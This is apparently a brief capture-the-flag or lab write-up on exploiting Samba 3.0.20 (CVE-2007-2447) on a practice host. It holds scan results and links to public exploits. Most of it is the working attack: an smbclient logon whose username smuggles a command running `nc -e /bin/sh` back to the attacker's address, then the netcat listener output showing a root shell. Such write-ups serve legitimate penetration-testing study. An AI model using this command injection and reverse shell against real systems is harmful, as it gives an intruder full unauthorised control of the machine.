4 :139 :445 smb exploit

We know
139/tcp  open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp  open  netbios-ssn Samba smbd 3.0.20-Debian (workgroup: WORKGROUP)

https://www.exploit-db.com/exploits/16320
https://github.com/amriunix/CVE-2007-2447
https://gist.github.com/joenorton8014/19aaa00e0088738fc429cff2669b9851

$ smbclient //10.10.10.3/tmp
Enter WORKGROUP\kashz's password:
Anonymous login successful
smb: \> logon "./=`nohup nc -e /bin/sh 10.10.14.2 7070`"
Password: 

$ rlwrap nc -lvnp 7070
listening on [any] 7070 ...
connect to [10.10.14.2] from (UNKNOWN) [10.10.10.3] 50322
whoami
root
id
uid=0(root) gid=0(root)

Last updated